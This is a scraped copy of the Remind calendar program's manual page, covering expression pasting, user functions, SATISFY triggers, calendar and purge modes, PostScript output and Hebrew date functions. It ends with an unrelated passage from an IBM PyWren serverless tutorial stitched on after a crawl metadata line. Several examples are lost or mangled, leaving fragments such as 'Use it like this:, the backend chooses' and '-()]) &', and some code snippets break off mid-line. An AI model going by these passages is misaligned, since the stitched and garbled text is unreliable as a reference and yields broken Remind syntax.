Returns a number from 0 to 6 representing the day-of-week of the specified date. (0 represents Sunday, and 6 represents Saturday.)
- year(dq_date)
Returns an INT that is the year component of date.
Expression Pasting
Remind allows you to "paste" the result of evaluating an expression into almost any command, by enclosing the expression in square brackets. For example, [mydate], where "mydate" is presumably some pre-computed variable, is evaluated and the result is pasted into the command line for the parser to process.
A formal description of this is: when Remind encounters a "pasted-in" expression, it evaluates the expression and coerces the result to a STRING. It then substitutes the string for the pasted-in expression, and continues parsing. Note, however, that expressions are evaluated only once, not recursively. Thus, writing:
["[a+b]"]
causes Remind to read the token "[a+b]". It does not interpret this as a pasted-in expression. In fact, the only way to get a literal left-bracket into a reminder is to use ["["].
You can use expression pasting almost anywhere. However, there are a few exceptions:
- If Remind is expecting an expression, as in the SET command, or the IF command, you should not include square brackets. For example, use:
SET a 4+5
and not:
SET a [4+5]
- You cannot use expression pasting for the first token on a line. For example, the following will not work:
["SET"] a 1
This restriction is because Remind must be able to unambiguously determine the first token of a line for the flow-control commands (to be discussed later.)
In fact, if Remind cannot determine the first token on a line (as is the case when the line starts with a pasted-in expression), it assumes that the line is a REM command. Thus, the following three commands are equivalent:
REM 12 Nov 1993 AT 13:05 MSG BOO!
12 Nov 1993 AT 13:05 MSG BOO!
[12] ["Nov " + 1993] AT [12:05+60] MSG BOO!
- You cannot use expression-pasting to determine the type (MSG, CAL, etc.) of a REM command. You can paste expressions before and after the MSG, etc keywords, but cannot do something like this:
REM ["12 Nov 1993 AT 13:05 " + "MSG" + " BOO!"]
COMMON PITFALLS IN EXPRESSION PASTING
Remember, when pasting in expressions, that extra spaces are not inserted. Thus, something like:
REM[expr]MSG[expr]
will probably fail.
If you use an expression to calculate a delta or back, ensure that the result is a positive number. Something like:
REM +[mydelta] Nov 12 1993 MSG foo
will fail if mydelta happens to be negative.
Flow Control Commands
Remind has commands that control the flow of a reminder script. Normally, reminder scripts are processed sequentially. However, IF and related commands allow you to process files conditionally, and skip sections that you don't want interpreted.
THE IF COMMAND
The IF command has the following form:
IF expr
   t-command
   t-command
   ...
ELSE
   f-command
   f-command
   ...
ENDIF
Note that the commands are shown indented for clarity. Also, the ELSE portion can be omitted. IF commands can be nested up to a small limit, probably around 8 or 16 levels of nesting, depending on your system.
If the expr evaluates to a non-zero INT, or a non-null STRING, then the IF portion is considered true, and the t-commands are executed. If expr evaluates to zero or null, then the f-commands (if the ELSE portion is present) are executed. If expr is not of type INT or STRING, then it is an error.
Examples:
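For instance, a minimal sketch of conditional processing (the variable name "athome" is illustrative):

   IF defined("athome")
      REM 1 MSG Pay rent!
   ELSE
      REM 1 +4 MSG Mail rent cheque
   ENDIF

Only the branch whose condition holds is processed; the other branch is skipped entirely.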
THE FSET COMMAND
In addition to the built-in functions, Remind allows you to define your own functions. The FSET command does this for you:
FSET fname(args) expr
Fname is the name of the function, and follows the convention for naming variables. Args is a comma-separated list of arguments, and expr is an expression. Args can be empty, in which case you define a function taking no parameters. Here are some examples:
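For instance (illustrative definitions, not from the original list of examples):

   FSET square(x) x*x
   FSET greeting() "Hello"

After these definitions, square(4) returns 16 and greeting() returns "Hello".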
- If you access a variable in expr that is not in the list of arguments, the "global" value (if any) is used.
- Function and parameter names are significant only to 12 characters.
- User-defined functions may call other functions, including other user-defined functions. However, recursive calls are not allowed.
- User-defined functions are not syntax-checked when they are defined; parsing occurs only when they are called.
The WARN keyword allows precise control over advance warning in a more flexible manner than the delta mechanism. It should be followed by the name of a user-defined function, warn_function.
If a warn_function is supplied, then it must take one argument of type INT. Remind ignores any delta, and instead calls warn_function successively with the arguments 1, 2, 3, ...
Warn_function's return value n is interpreted as follows:
- If n is positive, then the reminder is triggered exactly n days before its trigger date.
- If n is zero or negative, the iteration stops, and Remind does not call warn_function again.
Similarly to WARN, the SCHED keyword allows precise control over the scheduling of timed reminders. It should be followed by the name of a user-defined function, sched_function.
If a scheduling function is supplied, then it must take one argument of type INT. Rather than using the AT time, time delta, and time repeat, Remind calls the scheduling function to determine when to trigger the reminder. The first time the reminder is queued, the scheduling function is called with an argument of 1. Each time the reminder is triggered, it is re-scheduled by calling the scheduling function again. On each call, the argument is incremented by one.
The return value of the scheduling function must be an INT or a TIME. If the return value is a TIME, then the reminder is re-queued to trigger at that time. If it is a positive integer n, then the reminder is re-queued to trigger at the previous trigger time plus n minutes. Finally, if it is a negative integer or zero, then the reminder is re-queued to trigger n minutes before the AT time. Note that there must be an AT clause for the SCHED clause to do anything.
Here's an example:
FSET _sfun(x) choose(x,
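The definition above is truncated; a complete sketch, assuming choose(i, ...) selects its i-th value argument, might look like this:

   FSET _sfun(x) choose(x, -10, 5, 5)
   REM AT 12:00 SCHED _sfun MSG Lunch!

With this definition, the reminder first triggers 10 minutes before the AT time, then 5 minutes later, and again 5 minutes after that. (The offsets here are illustrative.)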
The form of REM that uses SATISFY is as follows:
REM trigger SATISFY expr
The way this works is as follows: Remind first calculates a trigger date, in the normal fashion. Next, it sets trigdate() to the calculated trigger date. It then evaluates expr. If the result is not the null string or zero, processing ends. Otherwise, Remind computes the next trigger date, and re-tests expr. This iteration continues until expr evaluates to non-zero or non-null, or until the iteration limit specified by the $MaxSatIter system variable is exceeded.
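The classic example finds Friday the 13th; a plausible sketch (wkdaynum() returns 5 for Friday):

   REM 13 SATISFY wkdaynum(trigdate()) == 5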
Let's see how this works. The SATISFY clause iterates through all the 13ths of successive months, until a trigger date is found whose day-of-week is Friday (== 5). If a valid date was found, we use the calculated trigger date to set up the next reminder.
We could also have written:
REM Fri SATISFY day(trigdate()) == 13
but this would result in more iterations, since "Fridays" occur more often than "13ths of the month."
This technique of using one REM command to calculate a trigger date to be used by another command is quite powerful. For example, suppose you wanted to OMIT Labour day, which is the first Monday in September. You could use:
#
the result will not be as you expect. Consider producing a calendar for September, 1992. Labour Day was on Monday, 7 September, 1992. However, when Remind gets around to calculating the trigger for Tuesday, 8 September, 1992, the OMIT command will now be omitting Labour Day for 1993, and the "Mon AFTER" command will not be triggered. (But see the description of SCANFROM in the section "Details about Trigger Computation.")
It is probably best to stay away from computing OMIT trigger dates unless you keep these pitfalls in mind.
For versions of Remind starting from 03.00.07, you can include a MSG, RUN, etc. clause in a SATISFY-type reminder, as follows:
REM trigger SATISFY expr MSG body
THE DEBUG COMMAND
The DEBUG command turns debugging options on and off from within a reminder script. Its format is:
DEBUG [+flagson] [-flagsoff]
Flagson and flagsoff consist of strings of the characters "extvlf" that correspond to the debugging options discussed in the command-line options section. If preceded with a "+", the corresponding group of debugging options is switched on. Otherwise, they are switched off. For example, you could use this sequence to debug a complicated expression:
DEBUG +x
set a very_complex_expression(many_args)
DEBUG -x
THE DUMPVARS COMMAND
The command DUMPVARS displays the values of variables in memory. Its format is:
DUMPVARS [var...]
If you supply a space-separated list of variable names, the corresponding variables are displayed. If you do not supply a list of variables, then all variables in memory are displayed. To dump a system variable, put its name in the list of variables to dump. If you put a lone dollar sign in the list of variables to dump, then all system variables will be dumped.
THE ERRMSG COMMAND
The ERRMSG command has the following format:
ERRMSG body
The body is passed through the substitution filter (with an implicit trigger date of today()) and printed to the error output stream. Example:
IF !defined("critical_var")
   ERRMSG You must supply a value for "critical_var"
   EXIT
ENDIF
THE EXIT COMMAND
The above example also shows the use of the EXIT command. This causes an unconditional exit from script processing. Any queued timed reminders are discarded. If you are in calendar mode (described next), then the calendar processing is aborted.
If you supply an INT-type expression after the EXIT command, it is returned to the calling program as the exit status. Otherwise, an exit status of 99 is returned.
THE FLUSH COMMAND
This command simply consists of the word FLUSH on a line by itself. The command flushes the standard output and standard error streams used by Remind. This is not terribly useful to most people, but may be useful if you run Remind as a subprocess of another program, and want to use pipes for communication.
Calendar Mode
If you supply the -c, -s or -p command-line option, then Remind runs in "calendar mode." In this mode, Remind interprets the script repeatedly, performing one iteration through the whole file for each day in the calendar. Reminders that trigger are saved in internal buffers, and then inserted into the calendar in the appropriate places.
If you produce a calendar for January, Remind executes the script 31 times, once for each day in January. Each time it executes the script, it increments the value of today(). Any reminders whose trigger date matches today() are entered into the calendar.
MSG and CAL-type reminders, by default, have their entire body inserted into the calendar. RUN-type reminders are not normally inserted into the calendar. However, if you enclose a portion of the body in the %"...%" sequence, only that portion is inserted. For example, consider the following:
REM 6 Jan MSG %"Dianne's birthday%" is %b
In the normal mode, Remind would print "Dianne's birthday is today" on 6 January. However, in the calendar mode, only the text "Dianne's birthday" is inserted into the box for 6 January.
If you explicitly use the %"...%" sequence in a RUN-type reminder, then the text between the delimiters is inserted into the calendar. If you use the sequence %"%" in a MSG or CAL-type reminder, then no calendar entry is produced for that reminder.
PRESERVING VARIABLES
Because Remind iterates through the script for each day in the calendar, slow operations may severely reduce the speed of producing a calendar.
For example, suppose you set the variables "me" and "hostname" as follows:
SET me shell("whoami")
SET hostname shell("hostname")
Normally, Remind clears all variables between iterations in calendar mode. However, if certain variables are slow to compute, and will not change between iterations, you can "preserve" their values with the PRESERVE command. Also, since function definitions are preserved between calendar iterations, there is no need to redefine them on each iteration. Thus, you could use the following sequence:
IF ! defined("initialized")
   set initialized 1
   set me shell("whoami")
   set hostname shell("hostname")
   fset func(x) complex_expr
   preserve initialized me hostname
ENDIF
The operation is as follows: On the first iteration through the script, "initialized" is not defined. Thus, the commands between IF and ENDIF are executed. The PRESERVE command ensures that the values of initialized, me and hostname are preserved for subsequent iterations. On the next iteration, the commands are skipped, since initialized has remained defined. Thus, time-consuming operations that do not depend on the value of today() are done only once.
System variables (those whose names start with '$') are automatically preserved between calendar iterations.
Note that for efficiency, Remind caches the reminder script (and any INCLUDEd files) in memory when producing a calendar.
Timed reminders are sorted and placed into the calendar in time order. These are followed by non-timed reminders. Remind automatically places the time of timed reminders in the calendar, formatted according to the -b command-line option.
The PS and PSFILE reminders pass PostScript code directly to the printer. They differ in that the PS-type reminder passes its body directly to the PostScript output (after processing by the substitution filter) while the PSFILE-type's body should simply consist of a filename. The Rem2PS program will open the file named in the PSFILE-type reminder, and include its contents in the PostScript output.
The PostScript-type reminders for a particular day are included in the PostScript output in sorted order of priority. Note that the order of PostScript commands has a major impact on the appearance of the calendars. For example, PostScript code to shade a calendar box will obliterate code to draw a moon symbol if the moon symbol code is placed in the calendar first. For this reason, you should not provide PS or PSFILE-type reminders with priorities; instead, you should ensure that they appear in the reminder script in the correct order. PostScript code should draw objects working from the background to the foreground, so that foreground objects properly overlay background ones. If you prioritize these reminders and run the script using descending sort order for priorities, the PostScript output will not work.
All of the PostScript code for a particular date is enclosed in a save-restore pair. However, if several PostScript-type reminders are triggered for a single day, each section of PostScript is not enclosed in a save-restore pair - instead, the entire body of included PostScript is enclosed.
PostScript-type reminders are executed by the PostScript printer before any regular calendar entries. Thus, regular calendar entries will overlay the PostScript-type reminders, allowing you to create shaded or graphical backgrounds for particular days.
Before executing your PostScript code, the origin of the PostScript coordinate system is positioned to the bottom left-hand corner of the "box" in the calendar representing today(). This location is exactly in the middle of the intersection of the bottom and left black lines delineating the box - you may have to account for the thickness of these lines when calculating positions.
Several PostScript variables are available to the PostScript code you supply. All distance and size variables are in PostScript units (1/72 inch.) The variables are:
- LineWidth
The width of the black grid lines making up the calendar.
- Border
The border between the center of the grid lines and the space used to print calendar entries. This border is normally blank space.
- BoxWidth and BoxHeight
The width and height of the calendar box, from center-to-center of the black gridlines.
- InBoxHeight
The height from the center of the bottom black gridline to the top of the regular calendar entry area. The space from here to the top of the box is used only to draw the day number.
- /DayFont, /EntryFont, /SmallFont, /TitleFont and /HeadFont
The fonts used to draw the day numbers, the calendar entries, the small calendars, the calendar title (month, year) and the day-of-the-week headings, respectively.
- DaySize, EntrySize, TitleSize and HeadSize
The sizes of the above fonts. (The size of the small calendar font is not defined here.) For example, if you wanted to print the Hebrew date next to the regular day number in the calendar, use:
REM PS Border BoxHeight Border sub DaySize sub moveto \
   /DayFont findfont DaySize scalefont setfont \
   ([hebday(today())] [hebmon(today())]) show
Note how /DayFont and DaySize are used.
Note that if you supply PostScript code, it is possible to produce invalid PostScript files. Always test your PostScript thoroughly with a PostScript viewer before sending it to the printer. You should not use any document structuring comments in your PostScript code.
Daemon Mode
If you use the -z command-line option, Remind runs in the "daemon" mode. In this mode, no "normal" reminders are issued. Instead, only timed reminders are collected and queued, and are then issued whenever they reach their trigger time.
In addition, Remind wakes up every few minutes to check the modification date on the reminder script (the filename supplied on the command line.) If Remind detects that the script has changed, it re-executes itself in daemon mode, and interprets the changed script.
In daemon mode, Remind also re-reads the reminder script when it detects that the system date has changed.
Purge Mode
If you supply the -j command-line option, Remind runs in purge mode. In this mode, it tries to purge expired reminders from your reminder files.
In purge mode, Remind reads your reminder file and creates a new file by appending ".purged" to the original file name. Note that Remind never edits your original file; it always creates a new .purged file.
If you invoke Remind against a directory instead of a file, then a .purged file is created for each *.rem file in the directory.
Normally, Remind does not create .purged files for INCLUDed files. However, if you supply a numeric argument after -j, then Remind will create .purged files for the specified level of INCLUDE. For example, if you invoke Remind with the argument -j2, then .purged files will be created for the file (or directory) specified on the command line, any files included by them, and any files included by those files. However, .purged files will not be created for third-or-higher level INCLUDE files.
Determining which reminders have expired is extremely tricky. Remind does its best, but you should always compare the .purged file to the original file and hand-merge the changes back in.
Remind annotates the .purged file as follows:
An expired reminder is prefixed with: #!P: Expired:
In situations where Remind cannot reliably determine that something was expired, you may see the following comments inserted before the problematic line:
#!P: Cannot purge SATISFY-type reminders
#!P: The next IF evaluated false...
#!P: REM statements in IF block not checked for purging.
#!P: The previous IF evaluated true.
#!P: REM statements in ELSE block not checked for purging
#!P: The next IFTRIG did not trigger.
#!P: REM statements in IFTRIG block not checked for purging.
#!P: Next line has expired, but contains expression... please verify
#!P: Next line may have expired, but contains non-constant expression
#!P! Could not parse next line: Some-Error-Message-Here
Remind always annotates .purged files with lines beginning with "#!P". If such lines are encountered in the original file, they are not copied to the .purged file.
Sorting Reminders
The -g option causes Remind to sort reminders by trigger date, time and priority before issuing them. Note that reminders are still calculated in the order encountered in the script. However, rather than being issued immediately, they are saved in an internal buffer. When Remind has finished processing the script, it issues the saved reminders in sorted order. The -g option can be followed by up to four characters that must all be "a" or "d". The first character specifies the sort order by trigger date (ascending or descending), the second specifies the sort order by trigger time and the third specifies the sort order by priority. If the fourth character is "d", the untimed reminders are sorted before timed reminders. The default is to sort all fields in ascending order and to sort untimed reminders after timed reminders.
In ascending order, reminders are issued with the most imminent first. Descending order is the reverse. Reminders are always sorted by trigger date, and reminders with the same trigger date are then sorted by trigger time. If two reminders have the same date and time, then the priority is used to break ties. Reminders with the same date, time and priority are issued in the order they were encountered.
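The resulting order is equivalent to a stable sort on a (date, time, priority) key. The following Python fragment (an independent illustration, not Remind code) shows the idea:

```python
# Reminders with equal (date, time, priority) keys keep their script order,
# because sorted() is stable; this matches Remind's tie-breaking rule.
reminders = [
    {"date": "2024-01-02", "time": "09:00", "prio": 5, "body": "B"},
    {"date": "2024-01-01", "time": "12:00", "prio": 5, "body": "A"},
    {"date": "2024-01-01", "time": "12:00", "prio": 1, "body": "C"},
]
ordered = sorted(reminders, key=lambda r: (r["date"], r["time"], r["prio"]))
print([r["body"] for r in ordered])  # ['C', 'A', 'B']
```

Descending order for a field simply reverses the comparison on that component of the key.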
You can define a user-defined function called SORTBANNER that takes one DATE-type argument. In sort mode, the following sequence happens:
If Remind notices that the next reminder to issue has a different trigger date from the previous one (or if it is the first one to be issued), then SORTBANNER is called with the trigger date as its argument. The result is coerced to a string, and passed through the substitution filter with the appropriate trigger date. The result is then displayed.
Here's an example: suppose SORTBANNER is defined so that a dated banner line is printed before each day's reminders.
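A definition along these lines would do (an illustrative sketch using functions documented above):

   FSET sortbanner(d) "Reminders for " + wkday(d) + ", " + day(d) + " " + mon(d) + ":"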
You can use the args() built-in function to determine whether or not SORTBANNER has been defined. (This could be used, for example, to provide a default definition for SORTBANNER in a system-wide file included at the end of the user's file.) Here's an example:
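A sketch of such a default definition, assuming args() returns -1 when the named function is not defined:

   IF args("sortbanner") < 0
      FSET sortbanner(d) "Reminders for " + wkday(d) + ":"
   ENDIF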
MESSAGE PREFIXES AND SUFFIXES
You can define user-defined functions called msgprefix() and msgsuffix(), each taking a single INT argument. When Remind issues a MSG-type reminder, the following steps occur:
- If msgprefix() is defined, it is evaluated with the priority of the reminder as its argument. The result is printed. It is not passed through the substitution filter.
- The body of the reminder is printed.
- If msgsuffix() is defined, it is evaluated with the priority of the reminder as its argument, and the result is printed. It is not passed through the substitution filter.
- If you are producing a calendar (with the -c, -s or -p options), an analogous pair of functions named calprefix() and calsuffix() can be defined. They work with all reminders that produce an entry in the calendar (i.e., CAL- and possibly RUN-type reminders, as well as MSG-type reminders.)
NOTES
Normally, the body of a reminder is followed by a carriage return. Thus, the results of msgsuffix() will appear on the next line. If you don't want this, end the body of the reminder with a percentage sign, "%". If you want a space between your reminders, simply include a carriage return (char(13)) as part of the msgsuffix() return value.
If Remind has problems evaluating msgprefix(), msgsuffix() or sortbanner(), you will see a lot of error messages. For an example of this, define the following:
fset msgprefix(x) x/0
Foreign Language Support
Your version of Remind may have been compiled to support a language other than English. This support may or may not be complete - for example, all error and usage messages may still be in English. However, at a minimum, foreign-language versions of Remind will output names of months and weekdays in the foreign language. Also, the substitution mechanism will substitute constructs suitable for the foreign language rather than for English.
A foreign-language version of Remind will accept either the English or foreign-language names of weekdays and months in a reminder script. However, for compatibility between versions of Remind, you should use only the English names in your scripts. Also, if your C compiler or run-time libraries are not "8-bit clean" or don't understand the ISO-Latin character set, month or day names with accented letters may not be recognized.
The Hebrew Calendar
Remind has support for the Hebrew calendar, which is a luni-solar calendar. This allows you to create reminders for Jewish holidays, jahrzeits (anniversaries of deaths) and smachot (joyous occasions.)
THE HEBREW YEAR
The Hebrew year has 12 months, alternately 30 and 29 days long. The months are: Tishrey, Heshvan, Kislev, Tevet, Shvat, Adar, Nisan, Iyar, Sivan, Tamuz, Av and Elul. In Biblical times, the year started in Nisan, but Rosh Hashana (Jewish New Year) is now celebrated on the 1st and 2nd of Tishrey.
In a cycle of 19 years, there are 7 leap years, being years 3, 6, 8, 11, 14, 17 and 19 of the cycle. In a leap year, an extra month of 30 days is added before Adar. The two Adars are called Adar A and Adar B.
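The 19-year cycle rule can be expressed with a standard closed form. This formula is a well-known equivalent, not taken from the Remind source:

```python
def is_hebrew_leap(year: int) -> bool:
    # Years 3, 6, 8, 11, 14, 17 and 19 of each 19-year cycle are leap years;
    # (7*year + 1) % 19 < 7 is a compact encoding of that rule.
    return (7 * year + 1) % 19 < 7

print([y for y in range(1, 20) if is_hebrew_leap(y)])  # [3, 6, 8, 11, 14, 17, 19]
```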
For certain religious reasons, the year cannot start on a Sunday, Wednesday or Friday. To adjust for this, a day is taken off Kislev or added to Heshvan. Thus, a regular year can have from 353 to 355 days, and a leap year from 383 to 385.
When Kislev or Heshvan is short, it is called chaser, or lacking. When it is long, it is called shalem, or full.
The Jewish date changes at sunset. However, Remind will change the date at midnight, not sunset. So in the period between sunset and midnight, Remind will be a day earlier than the true Jewish date. This should not be much of a problem in practice.
The computations for the Jewish calendar were based on the program "hdate" written by Amos Shapir of the Hebrew University of Jerusalem, Israel. He also supplied the preceding explanation of the calendar.
HEBREW DATE FUNCTIONS
- hebday(d_date)
Returns the day of the Hebrew month corresponding to the date parameter. For example, 12 April 1993 corresponds to 21 Nisan 5753. Thus, hebday('1993/04/12') returns 21.
- hebmon(d_date)
Returns the name of the Hebrew month corresponding to date. For example, hebmon('1993/04/12') returns "Nisan".
- hebyear(d_date)
Returns the Hebrew year corresponding to date. For example, hebyear('1993/04/12') returns 5753.
- hebdate(i_day, s_hebmon [,id_yrstart [,i_jahr [,i_aflag]]])
The hebdate() function is the most complex of the Hebrew support functions. It can take from 2 to 5 arguments. It returns a DATE corresponding to the Hebrew date.
The day parameter can range from 1 to 30, and specifies the day of the Hebrew month. The hebmon parameter is a string that must name one of the Hebrew months specified above. Note that the month must be spelled out in full, and use the English transliteration shown previously. You can also specify "Adar A" and "Adar B." Month names are not case-sensitive.
The yrstart parameter can either be a DATE or an INT. If it is a DATE, then hebdate() scans for the first Hebrew date on or after that date. For example, given a day of 22, a hebmon of "Kislev", and a yrstart early in 1995, hebdate() returns 1995/12/15, because that date corresponds to 22 Kislev, 5756. Note that none of the Hebrew date functions will work with dates outside Remind's normal range for dates.
If yrstart is not supplied, it defaults to today().
The jahr parameter modifies the behaviour of hebdate() as follows:
If jahr is 0 (the default), then hebdate() keeps scanning until it finds a date that exactly satisfies the other parameters. For example:
hebdate(30, "Adar A", '1993/01/01')
returns 1995/03/02, corresponding to 30 Adar A, 5755, because that is the next occurrence of 30 Adar A after 1 January, 1993. This behaviour is appropriate for Purim Katan, which only appears in leap years.
If jahr is 1, then the date is modified as follows:
- 30 Heshvan is converted to 1 Kislev in years when Heshvan is chaser
- 30 Kislev is converted to 1 Tevet in years when Kislev is chaser
- 30 Adar A is converted to 1 Nisan in non-leap years
If jahr is 2, then the date is modified as follows:
- 30 Kislev and 30 Heshvan are converted to 29 Kislev and 29 Heshvan, respectively, if the month is chaser
- 30 Adar A is converted to 30 Shvat in non-leap years
- Other dates in Adar A are moved to the corresponding day in Adar in non-leap years
If jahr is not 0, 1 or 2, it is interpreted as a Hebrew year, and the behaviour is calculated as described in the next section, "JAHRZEITS."
The aflag parameter modifies the behaviour of the function for dates in Adar during leap years. The aflag is only used if yrstart is a DATE type.
The aflag only affects date calculations if hebmon is specified as "Adar". In leap years, the following algorithm is followed:
- If aflag is 0, then the date is triggered in Adar B. This is the default.
- If aflag is 1, then the date is triggered in Adar A. This may be appropriate for jahrzeits in the Ashkenazi tradition; consult a rabbi.
- If aflag is 2, then the date is triggered in both Adar A and Adar B of a leap year. Some Ashkenazim perform jahrzeit in both Adar A and Adar B.
JAHRZEITS
A jahrzeit is a yearly commemoration of someone's death. It normally takes place on the anniversary of the death, but may be delayed if burial is delayed - consult a rabbi for more information.
In addition, because some months change length, it is not obvious which day the anniversary of a death is. The following rules are used:
- If the death occurred on 30 Heshvan or 30 Kislev, it is observed on the 30th of the month in years when that month is full, and on the first day of the following month in years when it is lacking.
- If the death occurred on 1-29 Adar A, it is observed on 1-29 Adar in non-leap years.
- If the death occurred on 30 Adar A, it is observed on 30 Shvat in non-leap years.
Specifying a Hebrew year for the jahr parameter causes the correct behaviour to be selected for a death in that year. You may also have to specify aflag, depending on your tradition.
The jahrzeit information was supplied by Frank Yellin, who quoted "The Comprehensive Hebrew Calendar" by Arthur Spier, and "Calendrical Calculations" by E. M. Reingold and Nachum Dershowitz.
The SHADE special shades the background of a calendar box. It is used like this:
REM ... SPECIAL SHADE n
or:
REM ... SPECIAL SHADE r g b
The SHADE keyword is followed by either one or three numbers, from 0 to 255. If one number is supplied, it is interpreted as a grey-scale value from black (0) to white (255). If three numbers are supplied, they are interpreted as RGB components from minimum (0) to maximum (255). One could, for instance, shade weekends a fairly dark grey and make Mondays a fully-saturated red. (These shadings appear in calendars produced by Rem2PS, tkremind and rem2html.)
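Such shading could be written as follows (an illustrative sketch; the exact shade values are arbitrary):

   REM Sat SPECIAL SHADE 96
   REM Sun SPECIAL SHADE 96
   REM Mon SPECIAL SHADE 255 0 0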
The MOON special replaces the psmoon() function. Use it like this:, the backend chooses an appropriate size.
fontsize is the font size in PostScript units of the msg
Msg is additional text that is placed near the moon glyph.
Note that only the Rem2PS backend supports moonsize and fontsize; the other backends use fixed sizes.
The COLOR special lets you place colored reminders in the calendar. Use it like this:
REM ... SPECIAL COLOR 255 0 0 This is a bright red reminder REM ... SPECIAL COLOR 0 128 0 This is a dark green reminder
You can spell COLOR either the American way ("COLOR") or the British way ("COLOUR"). This manual will use the American way.
Immediately following COLOR should be three decimal numbers ranging from 0 to 255 specifying red, green and blue intensities, respectively. The rest of the line is the text to put in the calendar.
The COLOR special is "doubly special", because in its normal operating mode, remind treats a COLOR special just like a MSG-type reminder. Also, if you invoke Remind with -cc..., then it approximates SPECIAL COLOR reminders on your terminal.
The WEEK special lets you place annotations such as the week number in the calendar. For example, this would number each Monday with the ISO 8601 week number. The week number is shown like this: "(Wn)" in this example, but you can put whatever text you like after the WEEK keyword.
REM Monday SPECIAL WEEK (W[weekno()])
Miscellaneous
COMMAND ABBREVIATIONS
The following tokens can be abbreviated:
- REM can be omitted - it is implied if no other valid command is present.
- CLEAR-OMIT-CONTEXT --> CLEAR
- PUSH-OMIT-CONTEXT --> PUSH
- POP-OMIT-CONTEXT --> POP
- DUMPVARS --> DUMP
- BANNER --> BAN
- INCLUDE --> INC
-()]) &
This reminder will run at one minute to midnight. It will cause a new Remind process to start at one minute past midnight. This allows you to have a continuous reminder service so you can work through the night and still get timed reminders for early in the morning. Note that this trick is no longer necessary, providing you run Remind in daemon mode.
This example warns you 5 days ahead of each American presidential election. The first REM command calculates the first Tuesday after the first Monday in November. (This is equivalent to the first Tuesday on or after 2 November.) The SATISFY clause ensures that the trigger date is issued only in election years, which are multiples of 4. The second REM command actually issues the reminder.
DETAILS ABOUT TRIGGER COMPUTATION
Here is a conceptual description of how triggers are calculated. Note that Remind actually uses a much more efficient procedure, but the results are the same as if the conceptual procedure had been followed.
Remind starts from the current date (that is, the value of today()) and scans forward, examining each day one at a time until it finds a date that satisfies the trigger, or can prove that no such dates (on or later than today()) exist.
If Remind is executing a SATISFY-type reminder, it evaluates the expression with trigdate() set to the date found above. If the expression evaluates to zero or the null string, Remind continues the scanning procedure described above, starting with the day after the trigger found above.
The SCANFROM clause (having a syntax similar to UNTIL) can modify the search strategy used. In this case, Remind begins the scanning procedure at scan_date, which is the date specified in the SCANFROM clause. For example:
REM Mon 1 SCANFROM 17 Jan 1992 MSG Foo
The example above will always have a trigger date of Monday, 3 February 1992. That is because Remind starts scanning from 17 January 1992, and stops scanning as soon as it hits a date that satisfies "Mon 1."
The main use of SCANFROM is in situations where you want to calculate the positions of floating holidays. Consider the Labour Day example shown much earlier. Labour Day is the first Monday in September. It can move over a range of 7 days. Consider the following sequence:.
In general, use SCANFROM as shown for safe movable OMITs. The amount you should scan back by (7 days in the example above) depends on the number of possible consecutive OMITted days that may occur, and on the range of the movable holiday. Generally, a value of 7 is safe.
The FROM clause operates almost like the counterpoint to UNTIL. It prevents the reminder from triggering before the FROM date. For example, the following reminder:')] \ UNTIL 2 Aug 2007 MSG Test
but that's a lot harder to read. Internally, Remind treats FROM exactly as illustrated using SCANFROM. For that reason, you cannot use both FROM and SCANFROM.
Note that if you use one REM command to calculate a trigger date, perform date calculations (addition or subtraction, for example) and then use the modified date in a subsequent REM command, the results may not be what you intended. This is because you have circumvented the normal scanning mechanism. You should try to write REM commands that compute trigger dates that can be used unmodified in subsequent REM commands. The file "defs.rem" that comes with the Remind distribution contains examples.
DETAILS ABOUT TRIGVALID()
The trigvalid() function returns 1 if Remind could find a trigger date for the previous REM or IFTRIG command. More specifically, it returns 1 if Remind finds a date not before the starting date of the scanning that satisfies the trigger. In addition, there is one special case in which trigvalid() returns 1 and trigdate() returns a meaningful result:
If the REM or IFTRIG command did not contain an UNTIL clause, and contained all of the day, month and year components, then Remind will correctly compute a trigger date, even if it happens to be before the start of scanning. Note that this behaviour is not true for versions of Remind prior to 03.00.01.
Author
Remind is now supported by Roaring Penguin Software Inc. ()
Dianne Skoll <[email protected]> wrote Remind. The moon code was copied largely unmodified from "moontool" by John Walker. The sunrise and sunset functions use ideas from programs by Michael Schwartz and Marc T. Kaufman. The Hebrew calendar support was taken from "hdate" by Amos Shapir. OS/2 support was done by Darrel Hankerson, Russ Herman, and Norman Walsh. The supported foreign languages and their translators are listed below. Languages marked "complete" support error messages and usage instructions in that language; all others only support the substitution filter mechanism and month/day names.
German -- Wolfgang Thronicke
Dutch -- Willem Kasdorp and Erik-Jan Vens
Finnish -- Mikko Silvonen (complete)
French -- Laurent Duperval (complete)
Norwegian -- Trygve Randen
Danish -- Mogens Lynnerup
Polish -- Jerzy Sobczyk (complete)
Brazilian Portuguese -- Marco Paganini (complete)
Italian -- Valerio Aimale
Romanian -- Liviu Daia
Spanish -- Rafa Couto
Icelandic -- Björn Davíðsson
Bugs
There's no good reason why read-only system variables are not implemented as functions, or why functions like version(), etc. are not implemented as read-only system variables.
Hebrew dates in Remind change at midnight instead of sunset.
Language should be selectable at run-time, not compile-time. Don't expect this to happen soon!
Remind has some built-in limits (for example, number of global OMITs.)
Bibliography
Nachum Dershowitz and Edward M. Reingold, "Calendrical Calculations", Software-Practice and Experience, Vol. 20(9), Sept. 1990, pp 899-928.
L. E. Doggett, Almanac for computers for the year 1978, Nautical Almanac Office, USNO.
Richard Siegel and Michael and Sharon Strassfeld, The First Jewish Catalog, Jewish Publication Society of America.
See Also
rem, rem2ps, tkremind
Referenced By
cm2rem(1), pilot-reminders(1), wyrd(1), wyrdrc(5). | https://www.mankier.com/1/remind | CC-MAIN-2017-39 | refinedweb | 17,478 | 64 |
@ibm+build smart
+buildsmart
Learn more >
@redhat+build open
+buildopen
Tutorial
Belinda Vennam | Published March 8, 2019
CloudData storesObject StorageServerless
This tutorial gets you up and running with PyWren so that you can quickly and easily scale your parallel workloads. Your code is run in parallel, as individual functions on a serverless platform.
PyWren is an open source project that enables Python developers to massively scale the execution of Python code and then monitor and combine the results of those executions. One of PyWren’s goals is to simplify this push to cloud experience, bringing the compute power of serverless computing to everyone.
PyWren is great for various use cases: processing data in object storage, running embarrassingly parallel compute jobs like Monte Carlo simulations, or enriching data with more attributes.
In this tutorial, you use PyWren to count the occurrences of words in a set of text documents in an object store. You set up a Cloud Object Storage Instance and add the .txt documents. Next, you set up PyWren and run some python code to count the words. This use case is simple, but you can see the benefits from scaling out the count action across a set of functions that are running in parallel.
.txt
You can use these word counts to find patterns or entities across a large set of documents or to help expand the variation of vocabulary in a set of essays.
In this tutorial, you learn:
To complete this tutorial, you need the following tools:
